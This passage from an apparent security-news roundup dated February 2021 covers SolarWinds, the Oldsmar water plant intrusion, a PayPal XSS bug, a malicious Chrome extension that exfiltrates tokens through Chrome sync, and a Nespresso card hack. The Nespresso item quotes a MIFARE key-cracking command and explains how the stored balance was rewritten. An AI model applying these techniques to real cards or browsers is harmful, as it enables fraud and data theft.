Some devices can be misconfigured for use outside of a local network, without adequate authorization.
IP webcams that are repackaged as baby monitors.
Manufacturer oversight.
On the first two points, baby monitors are designed for use on local networks that are linked together in one physical location, such as a residence, an office or a school. Thus, some allow local devices to connect to their streams freely, with the assurance that the privatized, local network itself will provide enough security.
“Unfortunately, if an organization (such as a daycare center) was to stream with this type of device online and the connection isn’t password-protected, there are no security procedures in place to stop anyone from gaining access to these cameras,” according to the researchers.
Some cameras also allow a direct connection to a laptop or computer that also has access to the internet, opening up a potential attack avenue.
The latter two points have to do with manufacturer choices.
“In the name of cutting-corners, various companies have been known to rebrand IP webcams as baby monitors,” according to the report. “This is a common occurrence within the e-commerce space, where a number of e-commerce stores wrongly advertise cameras as products that are suitable for use as a baby monitor. In most cases, the original manufacturer has not intended, nor marketed, their product for use as such.”
So, if a parent uses these cameras to view their video streams from outside of the home, these devices can quite easily become misconfigured, allowing unauthorized access without the owners realizing it.
“Manufacturers also have a responsibility to warn their customers that they must secure their devices properly before taking them online,” researchers noted. “Many brands fail to warn customers in a way that is glaringly obvious, if at all. Unfortunately, the end result of manufacturer oversight can be a slapdash product without any of the important authentication procedures.”
How to Protect Children from Snoopers
The potential impact of these misconfigurations can be severe, the researchers pointed out. But there are steps a user can take to only allow access to people who are permitted to view the video stream.
“Many of these cameras are streaming directly and indirectly identifiable information,” researchers said. “This can include anything from images of your children to the interior of your house or daycare center. Some hackers are even able to find out the name and address of the user (through the use of additional programs).”
Refer to the camera’s user guide to find out how to password-protect the device.
If the device does not allow users to set a password, avoid exposing it to the internet altogether.
Log into the home or facilty router and look for a setting called “access control” or “access list.” This allows users to whitelist specific IP addresses, allowing only those devices to connect. (Devices attempting to connect with the router will appear in a ‘blocked’ menu, and users can simply click ‘allow’ to grant them access.
Research each device thoroughly before buying, to make sure it’s a legitimate baby monitor and not a repackaged Wi-Fi webcam.
Daycare centers should make sure their devices are secured through password protection.
The malicious code in SolarWinds attack was the work of 1,000+ developers
16.2.2021 Hacking Securityaffairs
Microsoft says it found 1,000-plus developers’ fingerprints on the SolarWinds attack
Microsoft’s analysis of the SolarWinds supply chain attack revealed that the code used by the threat actors was the work of a thousand developers.
Microsoft president Brad Smith provided further details about the investigation of the SolarWinds supply chain attack, the company’s analysis of the malicious code involved in the hack suggests it was the work of a thousand developers.
Smith shared Miscosoft’s findings with the US TV program 60 Minutes, he defined the attack as “the largest and most sophisticated attack the world has ever seen.”
“When we analysed everything that we saw at Microsoft, we asked ourselves how many engineers have probably worked on these attacks. And the answer we came to was, well, certainly more than 1,000.” Smith said.
“What we are seeing is the first use of this supply chain disruption tactic against the United States,”“But it’s not the first time we’ve witnessed it. The Russian government really developed this tactic in Ukraine.”
The discovery is disconcerting and could give us an idea of the complexity of the attack and of the effort spent by the threat actors.
Smith didn’t attribute the attack to a specific threat actor, he only pointed out that the offensive was comparable in effort to the attacks on the Ukraine power grid that were attributed to Russia-linked APT groups.
FireEye CEO Kevin Mandia was also interviewed as part of the same TV program and described how his experts discovered the attack when hackers attempted to bypass two-factor authentication.
“Just like everybody working from home, we have two-factor authentication. A code pops up on our phone. We have to type in that code. And then we can log in. A FireEye employee was logging in, but the difference was our security staff looked at the login and we noticed that individual had two phones registered to their name. So our security employee called that person up and we asked, “Hey, did you actually register a second device on our network?” And our employee said, “No. It wasn’t, it wasn’t me.” said Mandia.
“Suspicious, FireEye turned its gaze inward, and saw intruders impersonating its employees snooping around inside their network, stealing FireEye’s proprietary tools to test its clients defenses and intelligence reports on active cyber threats. The hackers left no evidence of how they broke in – no phishing expeditions, no malware.”
Smith also revealed that the core of the malicious code employed in the attack was composed of 4,032 lines.
“SolarWinds Orion” is one of the most ubiquitous software products you probably never heard of, but to thousands of I.T. departments worldwide, it’s indispensable. It’s made up of millions of lines of computer code. 4,032 of them were clandestinely re-written and distributed to customers in a routine update, opening up a secret backdoor to the 18,000 infected networks.” Smith explained. “Microsoft has assigned 500 engineers to dig in to the attack. One compared it to a Rembrandt painting, the closer they looked, the more details emerged.”
Chris Inglis, former Deputy Director at National Security Agency explained that the government did not detect this attack because it is not looking on private sector networks. The government did not find it on their network, so that’s a disappointment, the attack bypasses government defense systems like the “Einstein” platform designed to detect cyber attacks on government agencies.
“The Russians outsmarted it. They circumvented the NSA, which gathers intelligence overseas, but is prohibited from surveilling U.S. computer networks. So the Russians launched their attacks from servers set up anonymously in the United States.” concludes Inglis.
“U.S. Intelligence Community, U.S. Department of Defense, can suggest what the intentions of other nations are based upon what they learn in their rightful work overseas. But they can’t turn around and focus their unblinking eye on the domestic infrastructure. That winds up making it more difficult for us.”
Many SolarWinds Customers Failed to Secure Systems Following Hack
16.2.2021 Hacking Securityweek
Many companies still expose SolarWinds Orion to the internet and have failed to take action following the disclosure of the massive SolarWinds breach, according to RiskRecon, a Mastercard company that specializes in risk assessment.
Threat actors believed to be backed by Russia breached Texas-based IT management firm SolarWinds and used that access to deliver a piece of malware named Sunburst to roughly 18,000 customers who had been using the company’s Orion monitoring product. A few hundred victims that presented an interest to the hackers received other payloads that provided deeper access into their environments.
A second, apparently unrelated threat group believed to be operating out of China also targeted SolarWinds, delivering a piece of malware named Supernova. The delivery of Supernova required access to the targeted network and involved exploitation of a zero-day vulnerability in Orion, which SolarWinds patched shortly after its existence came to light.
RiskRecon on Friday said it observed 1,785 organizations exposing Orion to the internet on December 13, 2020, shortly after the breach came to light, and the number dropped to 1,330 by February 1, 2021. However, only 8% of these companies have applied the Orion update (2020.2.4) released by SolarWinds in response to the breach.
Even more concerning is that 4% of the companies that expose Orion still use a version containing the Sunburst code. Moreover, roughly one-third of these organizations still haven’t patched the vulnerability exploited by Supernova.
RiskRecon says the list of organizations running vulnerable Orion instances includes state and local government agencies, universities, hosting providers, and Fortune 500 firms.
Microsoft Believes 1,000 Hackers Involved in SolarWinds Attack
An article published by the New York Times in January said some intelligence officials had concluded that “more than a thousand Russian software engineers” were most likely involved in the attack. Some cybersecurity professionals questioned the claims at the time.
However, Brad Smith, president and legal chief at Microsoft, reiterated the belief over the weekend in an interview on the CBS program 60 Minutes.
“When we analyzed everything that we saw at Microsoft, we asked ourselves how many engineers have probably worked on these attacks. And the answer we came to was, well, certainly more than 1,000,” Smith said, adding that Microsoft tasked 500 engineers with investigating the attack.
Smith also said the attackers had written roughly 4,000 lines of code that were then delivered to customers of SolarWinds’ Orion product.
“I think from a software engineering perspective, it's probably fair to say that this is the largest and most sophisticated attack the world has ever seen,” Smith said.
PayPal addresses reflected XSS bug in user wallet currency converter
15.2.2021 Hacking Securityaffairs
PayPal has addressed a reflected cross-site scripting (XSS) vulnerability that affected the currency converter feature of user wallets.
PayPal has fixed a reflected cross-site scripting (XSS) vulnerability that was discovered in the currency converter feature of user wallets on February 19, 2020, close one year ago.
The ‘reflected XSS and CSP bypass’ vulnerability was reported by the bug bounty hunter “Cr33pb0y” through the HackerOne platform.
“An endpoint used for currency conversion was found to suffer from a reflected XSS vulnerability, where user input was not being properly sanitized in a parameter in the URL. This could lead to a malicious user injecting malicious JavaScript, HTML, or any other type of code that the browser may execute. The malicious script will execute in the browser page DOM of another user typically without their knowledge or consent.” reads the summary published by PayPal.
PayPal has implemented additional validation checks and sanitizer controls for user input in the currency exchange feature before being returned in the response.
According to PayPal, the flaw resided in the currency conversion endpoint and was caused by a failure to properly sanitize the input in a parameter in the URL.
An attacker could have exploited the flaw to inject malicious code (JavaScript, HTML, or any other language) that will be executed within the browser.
This means that the malicious script will execute in the browser page Document Object Model (DOM) of another user typically without their knowledge or consent.
In a real attack scenario, threat actors could trigger the flaw by tricking the victims into clicking on a specially crafted link.
Malicious payloads could be executed to carry out multiple malicious activities, such as stealing cookies and session tokens.
Cr33pb0y received a $2,900 reward as part of the bug bounty program.
Florida Water Plant Hack: Leaked Credentials Found in Breach Database
13.2.2021 Hacking Threatpost
Researchers discovered credentials for the Oldsmar water treatment facility in the massive compilation of data from breaches posted just days before the attack.
Researchers say they found several stolen and leaked credentials for a Florida water-treatment plant, which was hacked last week.
Researchers at CyberNews said they found 11 credential pairs linked to the Oldsmar water plant, in a 2017 compilation of stolen breach credentials. Meanwhile, they also found 13 credential pairs in the more recent “compilation of many breaches”– COMB for short — that occurred just days before the attack.
This collection was leaked on the RaidForums English-language cybercrime community on Feb. 2 and contains a staggering 3.27 billion unique combinations of cleartext email addresses and passwords in an aggregate database.
Of note, officials have not publicly drawn any connection between the credentials discovered in the leaked credential breach databases and the attack last week.
The Florida Water Plant Hack
The attack on the Oldsmar water-treatment facility in Florida occurred last Friday, when an attacker used remote access to the system to change the level of sodium hydroxide, more commonly known as lye, in the water from 100 parts per million to 11,100 parts per million.
The change was immediately detected by a plant operator, who changed the levels back before the attack had any impact on the system.
According to a Massachusetts security advisory published Wednesday, the attackers accessed the water treatment plant’s SCADA controls via TeamViewer, which is remote access software. TeamViewer was installed on computers by the water treatment plant, used by personnel to conduct system status checks and to respond to alarms or other issues that cropped up during the water treatment process.
“All computers used by water plant personnel were connected to the SCADA system and used the 32-bit version of the Windows 7 operating system,” according to the recent advisory. “Further, all computers shared the same password for remote access and appeared to be connected directly to the Internet without any type of firewall protection installed.”
The Leaked Data-Breach Credentials
Researchers with CyberNews recently delved into a breach compilation leaked online by hackers in 2017 and the more recent COMB data trove “to search for credentials from the domain ci.oldsmar.fl.us,” according to a blog post published Thursday by Bernard Meyer with CyberNews, and found several matches.
Researchers claim the attackers may have used the credentials acquired from either the 2017 breach compilation or COMB in the hack. However, given the close date of the COMB leak to the attack, it’s more likely that it was in this database that attackers found the credentials used in the system breach, Meyer noted.
What’s not clear is how old the credentials are, and whether they are specific to TeamViewer or otherwise.
“Regarding the credentials for the Florida water supply system, we could not confirm whether they were admin or Teamviewer for legal and ethical reasons,” Mantas Sasnauskas, senior information security researcher at CyberNews, told Threatpost. “We just pointed to the fact that there were some type of [plant] credentials in the leaked [database].”
The Oldsmar Water Plant Hack: Credentials Used?
CyberNews researchers said that the attack was likely rolled out in multiple stages. “The first part of the cyber kill chain would be espionage and reconnaissance — looking at the ICS system, who controls it, what domain they use for emails, and whether they can be accepted as login usernames,” Meyer wrote.
The second phase may have involved a credential-stuffing attack that would have provided attackers remote access to the system, he said. In this type of attack, hackers build automated scripts that systematically try stolen IDs and passwords against various accounts until a match is found.
As part of this, he said, the attacker may have checked various compilations for leaked credentials on those domains for credential pairs, which is where the COMB cache may have come in handy, he said.
“The second stage of the cyber kill chain would be the actual intrusions–in this case, the credential stuffing,” he wrote.
It’s unclear if the COMB credentials were in fact used, but the fact that some of the plant’s logins were found in the database is a notable coincidence, researchers said.
Authorities from Pinellas County Sheriff’s Office, the FBI and the U.S. Secret Service are still working together to investigate exactly what happened in the attack, although they do not believe it was state-sponsored.
While authorities said they have leads in the attack, they still don’t know who exactly was behind it, where the attackers are located and what the motive might be. The incident once again is a reminder of the potential catastrophic effect an attack on critical infrastructure can have on public safety, making the security of these systems a top concern, security experts said.
Vulnerabilities in TCP/IP Stacks Allow for TCP Connection Hijacking, Spoofing
13.2.2021 Hacking Securityweek
Improperly generated ISNs (Initial Sequence Numbers) in nine TCP/IP stacks could be abused to hijack connections to vulnerable devices, according to new research from Forescout.
TCP/IP stacks are critical components that provide basic network connectivity for a broad range of devices, IoT and OT included, and which process all incoming frames and packets.
Numerous high-impact vulnerabilities affecting the TCP/IP stacks have already been publicly disclosed, including the Ripple20 and URGENT/11 bugs. In December last year, Forescout’s researchers detailed 33 new vulnerabilities in four open source TCP/IP stacks, collectively called AMNESIA:33.
Diving into 11 stacks this time, the researchers discovered that nine of them fail to properly generate ISNs, thus leaving connections open to attacks. Collectively referred to as NUMBER:JACK, the vulnerabilities affect cycloneTCP, FNET, MPLAB Net, Nucleus NET, Nut/Net, picoTCP, uIP, uC/TCP-IP, and TI-NDKTCPIP (Nanostack and lwIP are not impacted).
ISNs must be randomly generated, so as to ensure the uniqueness of any TCP connection between two devices, and to eliminate collisions and interference with the connection. However, should an attacker be able to guess an ISN, they could hijack an ongoing connection, close a connection (denial of service), or even spoof a new one.
Eight of the identified issues carry a CVSS score of 7.5, namely CVE-2020-27213 (Nut/Net 5.1), CVE-2020-27630 (uC/TCP-IP 3.6.0), CVE-2020-27631 (CycloneTCP 1.9.6), CVE-2020-27632 (NDKTCPIP 2.25), CVE-2020-27633 (FNET 4.6.3), CVE-2020-27634 (uIP 1.0, Contiki-OS 3.0, Contiki-NG 4.5), CVE-2020-27635 (PicoTCP 1.7.0, PicoTCP-NG), and CVE-2020-27636 (MPLAB Net 3.6.1), while the ninth has a CVSS score of 6.5 (CVE-2020-28388 – Nucleus NET 4.3).
“However, the actual severity on a particular device and TCP connection may vary depending on, for example, the use of encrypted sessions and the sensitivity of data exchanged,” Forescout’s researchers note.
With the vulnerable stacks implemented in millions of embedded devices, including IT storage systems, medical devices, remote terminal units (RTUs), and monitoring systems for wind turbines, among others.
Administrators are advised to identify devices that run the vulnerable TCP/IP stacks (Forescout has released an open-source script to aid with discovery), apply the available patches if possible, apply network segmentation to diminish risks, and use end-to-end cryptographic solutions built on top of the Network layer (IPsec).
The identified vulnerabilities were reported to the affected vendors and maintainers in October last year, and most of them have already released patches to address the bugs, except for Nut/Net developers, who are still working on a solution, and the uIP developers, who never replied to Forescout.
“Unfortunately, this type of vulnerability is also difficult to fix permanently because of the resource constraints of many embedded devices, and what is considered a secure PRNG today may be considered insecure in the future. Some stack developers opt to rely on system integrators to implement their own ISN generation, which is a fair decision, but which means not all devices using a patched stack will be secure automatically,” the researchers conclude.
Hacker Tries to Poison Water Supply of Florida Town
10.2.2021 Hacking Threatpost
A threat actor remotely accessed the IT system of the water treatment facility of Oldsmar and raised the levels of sodium hydroxide in the water, an action that was quickly noticed and remediated.
A threat actor hacked into the computer system of the water treatment facility in Oldsmar, Fla., and tried to poison the town’s water supply by raising the levels of sodium hydroxide, or lye, in the water supply. The attack happened just two days before NFL’s Super Bowl LV was held nearby in Tampa Bay, according to local authorities.
An operator at the plant first noticed a brief intrusion Friday, Feb. 5, around 8:00 a.m., Pinellas County Sheriff Bob Gualtieri said in a press conference about the incident Monday. Someone remotely accessed the computer system the operator was monitoring that controls chemical levels in the water as well as other operations, he said.
At first the operator “didn’t think much of it” because it’s normal for his supervisors to use the remote access feature to monitor his computer screen at times, Gualtieri said. However, around 1:30 p.m. someone again remotely accessed the computer system and the operator observed the mouse moving around on the screen to access various systems that control the water being treated, he said.
Lye Levels Raised at Water Treatment Plant
During the second intrusion, which lasted three to five minutes, the intruder changed the level of sodium hydroxide in the water from 100 parts per million to 11,100 parts per million, “a significant and potentially dangerous increase,” Gualtieri said.
“Sodium hydroxide, also known as lye, is the main ingredient in liquid drain cleaners,” he said. “It is used to control water acidity and remove metals from drinking water in water-treatment plants.”
Fortunately, the operator quickly changed the level back to normal after the intrusion and alerted supervisors, who then contacted the Pinellas County Sheriff’s Office. Gualtieri said his team notified the FBI and U.S. Secret Service and worked with them over the weekend to investigate and try to discover who was behind the attack.
At this time authorities have leads but have not identified a suspect, nor do they know if the attack came from inside the United States or outside the country, he said.
Motive Behind Hack Remains Elusive
They also do not have a motive for the attack, although it did occur just before the Super Bowl was held in Tampa Bay on Sunday. The event can typically draw upwards of 150,000 visitors to the region but this year only about 22,000 live spectators were allowed to attend the game due to the COVID-19 pandemic.
Still, Gualtieri asked all critical infrastructure operators in the Tampa Bay area to check to ensure that their systems have the latest security protocols in place. He also stressed that despite the seriousness of the Oldsmar incident, “at no time was there a significant adverse effect on the water being treated.”
“Importantly, the public was never in danger,” Gualtieri said.
Even if the operator hadn’t so quickly noticed the nefarious activity, he said it would have taken 24 to 36 hours for the tainted water to hit the water supply, and redundancies in the system would have tested it before then and caught the high levels of sodium hydroxide.
At Risk: Critical Infrastructure
Still, the incident is a dire reminder of the potential catastrophic effect an attack on critical infrastructure can have on public safety, making the security of these systems a top concern, security experts said.
“With so much emphasis recently placed on hacks for the health care and financial services industry, an infrastructure hack such as this tends to hit much closer to home as it regards our physical safety,” noted Tom Garrubba, CISO of Shared Assessments, in an email to Threatpost.
Indeed, given past attacks on the U.S. critical infrastructure such as the power grid, water systems and nuclear plants, organizations in control of these systems should take the latest attack in Florida as a call to action, observed Hitesh Sheth, president and CEO at Vectra, a San Jose, Calif.-based provider of AI for detecting cyberattacks, in an e-mail to Threatpost.
“Protecting these critical facilities, and upgrading their cyber defenses, should be a far higher priority,” he said.
Some experts cited the COVID-19 pandemic for putting critical infrastructure at higher risk due to the necessity of putting remote access capabilities in place sooner than operators of these systems expected for employees forced to work remotely due to pandemic restrictions.
“Many organizations have previously felt protected by traditional perimeter security such as firewalls and VPNs,” observed Kevin Dunne, president at Greenlight, a Flemington, New Jersey-based integrated risk management firm, in an e-mail to Threatpost. “However, the new shift to work from anywhere has reduced the efficacy of many of these methods and even rendered some of them useless.”
Rather than use VPNs to secure networks, Dunne suggested that the most effective way to secure remote access is to monitor identity and access “to know exactly who is access critical systems and what they are doing with that access,” he said.
Hack Exposes Vulnerability of Cash-Strapped US Water Plants
10.2.2021 Hacking Securityweek
A hacker’s botched attempt to poison the water supply of a small Florida city is raising alarms about just how vulnerable the nation’s water systems may be to attacks by more sophisticated intruders. Treatment plants are typically cash-strapped, and lack the cybersecurity depth of the power grid and nuclear plants.
A local sheriff’s startling announcement Monday that the water supply of Oldsmar, population 15,000, was briefly in jeopardy last week exhibited uncharacteristic transparency. Suspicious incidents are rarely reported, and usually chalked up to mechanical or procedural errors, experts say. No federal reporting requirement exists, and state and local rules vary widely.
“In the industry, we were all expecting this to happen. We have known for a long time that municipal water utilities are extremely underfunded and under-resourced, and that makes them a soft target for cyber attacks,” said Lesley Carhart, principal incident responder at Dragos Security, which specializes in industrial control systems.
“I deal with a lot of municipal water utilities for small, medium and large-sized cities. And in a lot of cases, all of them have a very small IT staff. Some of them have no dedicated security staff at all,” she said.
The nation’s 151,000 public water systems lack the financial fortification of the corporate owners of nuclear power plants and electrical utilities. They are a heterogenous patchwork, less uniform in technology and security measures than in other rich countries.
As the computer networks of vital infrastructure become easier to reach via the internet — and with remote access multiplying dizzily during the COVID-19 pandemic — security measures often get sacrificed.
“It’s a hard problem, but one that we need to start addressing,” said Joe Slowik, senior security researcher at DomainTools. He said the hack illustrates “a systemic weakness in this sector.”
Cybersecurity experts said the attack at the plant 15 miles northwest of Tampa seemed ham-handed, it was so blatant: Whoever breached Oldsmar’s plant on Friday using a remote access program shared by plant workers briefly increased the amount of lye — sodium hydroxide — by a factor of 100, according to Pinellas County Sheriff Bob Gualtieri. Lye is used to lower acidity, but in high concentrations it is highly caustic and can burn. It’s found in drain cleaning products.
The intruder’s timing and visibility seemed almost comical to cybersecurity experts. A supervisor monitoring a plant console about 1:30 p.m. saw a cursor move across the screen and change settings, Gualtieri said, and was able to immediately reverse it. The intruder was in and out in five minutes.
The public was never in peril, though the intruder took “the sodium hydroxide up to dangerous levels,” the sheriff said. Also, plant safeguards would have detected the chemical alteration in the 24-36 hours it would have taken to affect the water supply, he said.
Gualtieri said Tuesday that water goes to holding tanks before reaching customers, and “it would have been caught by a secondary chemical check.” He did not know if the hacker was domestic or foreign — and said no one related to a plant employee was suspected. He said the FBI and Secret Service were assisting in the investigation. How the hacker got in remains unclear, he said, though it was possible the hacker was able to create administrator credentials.
Jake Williams, CEO of the cybersecurity firm Rendition Infosec, said engineers have been creating safeguards “since before remote control via cyber was a thing,” making it highly unlikely the breach could have led to “a cascade of failures” tainting Oldsmar’s water.
There’s been an uptick in hacking attempts of water treatment plants in the past year, the cybersecurity firm FireEye said, but most were by novices, many stumbling on systems while using a kind of search engine for industrial control systems called Shodan.
The serious threat is from nation-state hackers like the Russian agents blamed for the months-long SolarWinds campaign that has plagued U.S. agencies and the private sector for at least eight months and was discovered in December. While U.S. officials have called SolarWinds a grave threat, they also call it cyberespionage, rather than an attempt to do damage.
Laying boobytraps that could be triggered in an armed conflict is another matter. Russian hackers are known to have infiltrated U.S. industrial control systems, including the power grid, and Iranian agents are blamed for the breach of a suburban New York dam in 2013. But there is no indication any “logic bombs” have been activated, as Russia did in Ukraine when military hackers briefly brought down parts of the electrical grid in the winters of 2015 and 2016.
A 2020 paper in the Journal of Environmental Engineering found that water utilities have been hacked by a variety of actors, including amateurs just poking around, disgruntled former employees, cybercriminals looking to profit and state-sponsored hackers. Although such incidents have been relatively few that does not mean the risk is low and that most water systems are secure. This is because so-called “air gaps” between internet-connected networks and the systems that directly manage pumps and other plant components are becoming less common.
“The reality is that many cybersecurity incidents either go undetected, and consequently unreported or are not disclosed because doing so may jeopardize the victims reputation, customers trust, and, consequently, revenues,” the paper says.
After Friday’s incident, Oldsmar officials disabled the remote-access system and warned other city leaders in the region — which was hosting the Super Bowl — to check their systems.
In May, Israel’s cyber chief said the country had thwarted a major cyber attack the previous month against its water systems, an assault widely attributed to Iran. Had Israel not detected the attack in real time, he said chlorine or other chemicals could have entered the water, leading to a “disastrous” outcome.
The Biden administration has already signaled its intention of beefing up cybersecurity, a sector its predecessor was roundly accused of not taking seriously enough.
So far this year, the Department of Homeland Security has issued 25 advisories listing various industrial control systems that could be vulnerable to hacking. Affected products range from 3D rendering software to security cameras to insulin pumps.
Chris Sistrunk, a technical manager at FireEye’s Mandiant division, said cybersecurity issues are relatively new for U.S. water utilities, whose biggest problems are pipes freezing and busting in winter or getting clogged with disposable wipes. The Oldsmar hack highlights the need for more training and basic security protocols, but not drastic measures like sweeping new regulations.
“We have to do something, we can’t do nothing. But we can’t overreact,” he said.
Fake Forcepoint Google Chrome Extension Hacks Windows Users
9.2.2021 Hacking Threatpost
In a unique attack, cybercriminals locally install an extension to manipulate data in internal web applications that the victims have access to.
Cybercriminals have been using a novel approach to exfiltrate data that involves directly injecting malicious Google Chrome extensions onto victims’ Windows machines via the abuse of Google’s cloud synching function.
The goal of the recently-identified campaign is to manipulate data in internal web applications that the victims have access to, according to an analysis.
According to Bojan Zdrnja, writing for the SANS Institute, attackers are directly planting malicious extensions on the targets’ computers, rather than uploading them to the Chrome Web Store and waiting for victims to download them.
The malicious add-on is disguised as a “Forcepoint Endpoint Chrome Extension for Windows,” with the attackers using the security company’s logo to enhance an air of legitimacy.
The threat actors “dropped the extension locally in a folder and loaded it directly from Chrome on a compromised workstation,” explained Zdrnja, in an analysis late last week. “This is actually a legitimate function in Chrome – you can access it by going to More Tools -> Extensions and enabling Developer mode, after which you can load any extensions locally, directly from a folder by clicking on ‘Load unpacked.'”
The analysis doesn’t detail how the initial compromise was carried out. However, when it comes to the attack goal, “they actually limited activities on this workstation to those related to web applications, which explains why they dropped only the malicious Chrome extension, and not any other binaries,” the researcher explained. “That being said, it also makes sense – almost everything is managed through a web application today, be it your internal CRM, document management system, access rights management system or something else.”
How to Create a Malicious Google Chrome Extension
For all Chrome extensions, configuration parameters are stored in a file named manifest.json. In the case of the faux Forcepoint extension, three specific malicious functions stood out to Zdrnja.
The authors used a “content_scripts” parameter to define which JavaScript files will be injected into web pages by the extension.
“can be used by an attacker to add arbitrary code to target web pages (think about changing content and stealing data),” the researcher noted.
Next, a permissions parameter specified that the extension can use the storage API.
And finally, the background parameter specifies JavaScript files that will run when extension is loaded.
“This is where the attacker had their exfiltration and command-and-control features embedded,” he added. “Background files are extremely powerful and allow a script to receive a message (and send it) in background (as the name says).”
‘Chats’ with Legit Extensions to Steal Data
The authors of the malicious Forcepoint add-on were able to steal information from users’ internal extensions thanks to setting up a behind-the-scenes “chat” between the malicious extension and other web apps.
A function called “chrome.runtime.onConnectExternal.addListener,” is provided by the Chrome browser to extensions. As its name suggests, it listens for when a connection to the browser is made from another extension. Meanwhile, a port object called “port.onMessage.addListener,” is employed, which allows for two-way communication between the extensions.
The extension then steals credentials – mail and oAuth tokens – from the victim’s machine.
“There is a switch that checks the value of parameter type in the received message,” according to the analysis. “Now an interesting thing happens: if the value of the type parameter is ‘check_oauth_token_status,’ the extension will verify if there is a key called ‘oauth_token’ in Chrome’s storage. If it is there, it will send back (to the other extension) a message containing the value of the token with the status set to true, after which it will be deleted from Chrome’s storage.”
If the value of the type parameter is “save_mailhighlight_token,” the malicious extension will create a new key in Chrome’s storage called email, which will be saved in Chrome’s storage.
The extension also uses the “chrome.storage.sync.get” and “chrome.storage.sync.save” methods, so that all these values will be automatically synced to Google’s cloud by Chrome, under the context of the user being logged in in Chrome. This provides an unusual exfiltration method.
“In order to set, read or delete these keys, all the attacker has to do is log in with the same account to Google, in another Chrome browser (and this can be a throwaway account), and they can communicate with the Chrome browser in the victim’s network by abusing Google’s infrastructure,” Zdrnja explained.
A Novel Type of Cyberattack
Attackers can use this approach for exfiltrating data as well as C2 communications.
“While there are some limitations on size of data and amount of requests, this is actually perfect for C2 commands (which are generally small), or for stealing small, but sensitive data – such as authentication tokens,” according to the researcher. “It will be slow because Chrome and Google throttle requests, allowing us to transfer 4 MB at a time.”
Overall, the attack is unusual and novel, he added: “there were also some things that I saw for the first time, which is why I think this particular exploitation is novel.”
To protect their environments, admins should make sure that Chrome extensions are controlled, according to Zdrnja.
“Google allows you to do that through group policies so you can define exactly which extensions are allowed/approved and block everything else,” he said.
Hacking Nespresso machines to have unlimited funds to purchase coffee
8.2.2021 Hacking Securityaffairs
Some commercial Nespresso machines that are used in Europe could be hacked to add unlimited funds to purchase coffee.
Some Nespresso Pro machines in Europe could be hacked to add unlimited funds to purchase coffee. The attack is possible because the machines use a smart card payment system that leverages insecure technology, the MIFARE Classic smart cards.
The vulnerability was disclosed by the security researcher Polle Vanhoof.
The Mifare Classic smart card technology is known to be insecure since 2008, when security researchers from Radboud University Nijmegen performed reverse engineering of the chip and published their findings.
The experts demonstrated how to clone and manipulate the contents of a MIFARE Classic chip.
The chipmaker NXP Semiconductor tried to stop the publication of the research by requesting a preliminary injunction that was denied.
Then NXP Semiconductor recommended customers to use its Mifare Plus cards that use AES-128.
Vanhoof’s arsenal included an NFC card reader / writer, the nfc-mfclassic – MIFARE classic command line tool, and a version of mfoc MIFARE Classic offline cracker that he modified.
The researchers wrote a Python script that used to crack the weak encryption and dumped the card’s binary.
The researcher was able to crack the keys and dumping the smartcard.
“To start things off, we will want to crack any non-default keys present on the Nespresso card.” wrote the expert. We can easily do this using the mfoc tool. We run the following command:
mfoc -P 500 -O nespresso.dmp
“We see in the output below that the card uses default keys for most sectors except the last 4. It takes the tool a couple of minutes to break the remaining 4 keys and they are dumped to our screen.”
Then he was able to manually grab the keys that were found in the data dump.
In the second part of the attack, the expert attempted to find the field associated with the funds while purchasing a coffee. To do this he made different purchases with different amounts of money.
“We are working on the assumption that the value of the card is kept on the card itself rather than on some centralized server. This is a much simpler and cost effective design, requiring less hardware and software to implement, making it a likely choice for anyone developing such a system unaware of the security weaknessess of the MIFARE Classic.” Vanhoof added. “We charge our card with some value.”
Once identified the bytes on the card that were changing while purchasing the coffee (three bytes), Vanhoof demonstrated that by altering them he was able to manipulate the money amount to pay the coffee. He wrote a value of €167,772.15 on the card using the nfc-mfclassic tool.
The expert also provided potential mitigations to secure the payment process such as:
Hardware upgrade: Upgrade the smartcards for future products and use more secure alternatives
Software mitigation: Upgrade the machines to keep the money value on a backend server rather than on the card itself, only using the cards as a “Personal ID”
“After talking to Nespresso, it seems they already offer both of these options. Clients concerned with the security of their systems should look into these alternatives.” concludes the expert.
Below the disclosure timeline:
24 September 2020: Initial disclosure of findings to Nestlé Nespresso S.A
24 September 2020: The vendor was quick in communicating and setting up a meeting to discuss the vulnerability
09 October 2020: Full disclosure of technical details to vendor
02 February 2021: Nespresso confirmed they agreed with publishing this writeup
Over a Dozen Chrome Extensions Caught Hijacking Google Search Results for Millions
4.2.2021 Hacking Thehackernews
New details have emerged about a vast network of rogue extensions for Chrome and Edge browsers that were found to hijack clicks to links in search results pages to arbitrary URLs, including phishing sites and ads.
Collectively called "CacheFlow" by Avast, the 28 extensions in question — including Video Downloader for Facebook, Vimeo Video Downloader, Instagram Story Downloader, VK Unblock — made use of a sneaky trick to mask its true purpose: Leverage Cache-Control HTTP header as a covert channel to retrieve commands from an attacker-controlled server.
All the backdoored browser add-ons have been taken down by Google and Microsoft as of December 18, 2020, to prevent more users from downloading them from the official stores.
password auditor
According to telemetry data gathered by the firm, the top three infected countries were Brazil, Ukraine, and France, followed by Argentina, Spain, Russia, and the U.S.
The CacheFlow sequence began when unsuspecting users downloaded one of the extensions in their browsers that, upon installation, sent out analytics requests resembling Google Analytics to a remote server, which then beamed back a specially-crafted Cache-Control header containing hidden commands to fetch a second-stage payload that functioned as a downloader for the final JavaScript payload.
This JavaScript malware amassed birth dates, email addresses, geolocation, and device activity, with a specific focus on collecting the data from Google.
"To retrieve the birthday, CacheFlow made an XHR request to https://myaccount.google.com/birthday and parsed out the birth date from the response," Avast researchers Jan Vojtìšek and Jan Rubín observed.
In the final step, the payload injected another piece of JavaScript into each tab, using it to hijack clicks leading to legitimate websites, as well as modify search results from Google, Bing, or Yahoo to reroute the victim to a different URL.
That's not all. The extensions not only avoided infecting users who were likely to be web developers — something that was deduced by computing a weighted score of the extensions installed or by checking if they accessed locally-hosted websites (e.g., .dev, .local, or .localhost) — they were also configured to not exhibit any suspicious behavior during the first three days post-installation.
Avast said the myriad tricks employed by the malware authors to escape detection may have been a crucial factor that allowed it to execute malicious code in the background and stealthily infect millions of victims, with evidence suggesting that the campaign may have been active since at least October 2017.
"We usually trust that the extensions installed from official browser stores are safe," the researchers said. "But that is not always the case as we recently found."
"CacheFlow was notable in particular for the way that the malicious extensions would try to hide their command and control traffic in a covert channel using the Cache-Control HTTP header of their analytics requests. We believe this is a new technique."
Domain for programming website Perl.com hijacked
30.1.2021 Hacking Securityaffairs
Threat actors took over the domain name perl.com and pointed it to an IP address associated with malware campaigns.
